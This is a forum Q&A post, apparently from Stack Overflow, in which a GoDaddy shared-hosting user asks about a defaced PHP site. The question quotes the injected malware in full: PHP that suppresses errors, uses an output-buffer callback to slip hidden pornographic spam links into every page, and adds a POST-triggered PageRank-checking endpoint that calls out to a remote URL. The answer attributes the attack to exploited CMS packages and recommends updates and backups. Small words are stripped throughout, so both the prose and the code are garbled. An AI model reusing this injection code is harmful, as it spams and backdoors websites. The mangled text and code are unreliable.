php - my site got defaced. how to protect myself on shared hosting? -
i have godaddy shared hosting , site got defaced. @ fault? site created php possible person can in through vunerability on site , modify file? or through server side being godaddy wasnt secure enough?
this injected in file. do?
<?php //{{1311051f global $alreadyxxx; if($alreadyxxx != 1) { $alreadyxxx = 1; $olderrxxx=error_reporting(0); function outputxxx_callback($str) { $links = '<span style="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="rb4d41ca36473534443c002805"><a href="">blow jobs teen</a><br></div></span>'; preg_match("|</body>|si",$str,$arr); return str_replace($arr[0],$links.$arr[0],$str); } function strtonum($str, $check, $magic) { $int32unit = 4294967296; $length = strlen($str); ($i = 0; $i < $length; $i++) { $check *= $magic; if ($check >= $int32unit) { $check = ($check - $int32unit * (int) ($check / $int32unit)); $check = ($check < -2147483648) ? ($check + $int32unit) : $check; } $check += ord($str{$i}); } return $check; } function hashurl($string) { $check1 = strtonum($string, 0x1505, 0x21); $check2 = strtonum($string, 0, 0x1003f); $check1 >>= 2; $check1 = (($check1 >> 4) & 0x3ffffc0 ) | ($check1 & 0x3f); $check1 = (($check1 >> 4) & 0x3ffc00 ) | ($check1 & 0x3ff); $check1 = (($check1 >> 4) & 0x3c000 ) | ($check1 & 0x3fff); $t1 = (((($check1 & 0x3c0) << 4) | ($check1 & 0x3c)) <<2 ) | ($check2 & 0xf0f ); $t2 = (((($check1 & 0xffffc000) << 4) | ($check1 & 0x3c00)) << 0xa) | ($check2 & 0xf0f0000 ); return ($t1 | $t2); } function checkhash($hashnum) { $checkbyte = 0; $flag = 0; $hashstr = sprintf('%u', $hashnum) ; $length = strlen($hashstr); ($i = $length-1; $i >= 0; $i--) { $re = $hashstr{$i}; if (1 === ($flag % 2)) { $re += $re; $re = (int)($re / 10) + ($re % 10); } $checkbyte += $re; $flag ++; } $checkbyte %= 10; if (0 !== $checkbyte) { $checkbyte = 10 - $checkbyte; if (1 === ($flag % 2) ) { if (1 === ($checkbyte % 2)) { $checkbyte += 9; } $checkbyte >>= 1; } } return '7'.$checkbyte.$hashstr; } function getpr($url) { $ch = checkhash(hashurl($url)); $file = "$ch&features=rank&q=info:$url";; $data = file_get_contents($file); $pos = strpos($data, "rank_"); if($pos === false){return -1;} else{ $pr=substr($data, $pos + 9); $pr=trim($pr); $pr=str_replace(" ",'',$pr); return $pr; } } if(isset($_post['xxxprch'])) { echo getpr($_post['xxxprch']); exit(); } else ob_start('outputxxx_callback'); error_reporting($olderrxxx); } //}}75671d8f ?>
chances exploit package use on site (such phpbb, phpnuke, etc.) people crawl web looking vulnerable hosts , exploit ones can. code open-source , readily available there's not can protection other use latest version.
companies packetstormsecurity make easy "skript kiddies" find poc (proof of concept) script , take upon try on every site can. easy crafted google query find list of potential targets.
you may able through logs url resulted in exploit, best-case scenario stay up-to-date possible, , never rely on host make restore-able backups of site.
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